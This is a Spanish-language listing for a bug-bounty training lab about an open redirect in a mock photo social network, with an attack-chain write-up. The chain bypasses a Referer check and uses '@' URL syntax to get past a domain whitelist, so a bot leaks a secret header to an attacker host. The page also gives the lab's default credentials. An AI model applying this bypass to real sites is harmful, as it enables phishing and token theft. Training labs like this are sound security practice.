Medium$14030 min
Open Redirect con Referer Check + Domain Bypass (@)
Red social de fotos con endpoint de tracking publicitario vulnerable a open redirect. El endpoint valida Referer (bypass: publicar link en la plataforma) y dominio de destino (bypass: RFC 3986 @ syntax). Un bot clicka links de comentarios con un header secreto que contiene la flag
521 views17 completedUpdated Sep 2026
Learn to find this bug
This bug paid $140 on YesWeHack.
Create your account and practice real bugs that got paid. Download the environment, find it and learn the exact technique — your path to your first bounty.
650
hunters training
50
labs from real hacks
380
completions
$12,000
paid out for these bugs
40 flags captured this week
Access to all labs · no commitment · cancel anytime
Hackers who solved it· 8
Objectives
1
Explorar la app → descubrir posts patrocinados con tracking URLs2
Analizar: /ads/tr?ci=X&e=sk&tu=https://cdn.snapvibe.com/...3
Probar sin Referer → 4014
Probar con Referer válido → 302 (funciona)5
Probar tu=https://evil.com → 400 (dominio no whitelisted)6
Bypass dominio: tu=http://cdn.snapvibe.com@localhost:9999 → 302!7
Publicar link completo como comentario en una foto8
Bot clicka → sigue redirect → llega a attacker con X-Secret-TokenAchievement you'll earn
Solve this lab to unlock this shareable achievement
BBLABS.ESLab Solved
Medium$140
// achievement_unlocked
Open Redirect con Referer Check + Domain Bypass (@)
Open Redirect
Sep 2026
solved_by@gorkaMember since Mar 2026
bblabs.es// real hacking practice
Community writeups
Cadena de ataque
1. Explorar la app → descubrir posts patrocinados con tracking URLs
2. Analizar: /ads/tr?ci=X&e=sk&tu=https://cdn.snapvibe.com/...
3. Probar sin Referer → 401
4. Probar con Referer válido → 302 (funciona)
5. Probar tu=https://evil.com → 400 (dominio no whitelisted)
6. Bypass dominio: tu=http://cdn.snapvibe.com@localhost:9999 → 302!
7. Publicar link completo como comentario en una foto
8. Bot clicka → sigue redirect → llega a attacker con X-Secret-Token
9. Flag: ......
Credenciales
| Usuario | Contraseña | Rol |
|---|---|---|
| sarah_photo | password123 | user |
| mike_design | password123 | user |
| elena_travel | password123 | user |
Despliegue
./autodeploy.sh
# o: docker compose up --build
# Acceder: http://localhost:1000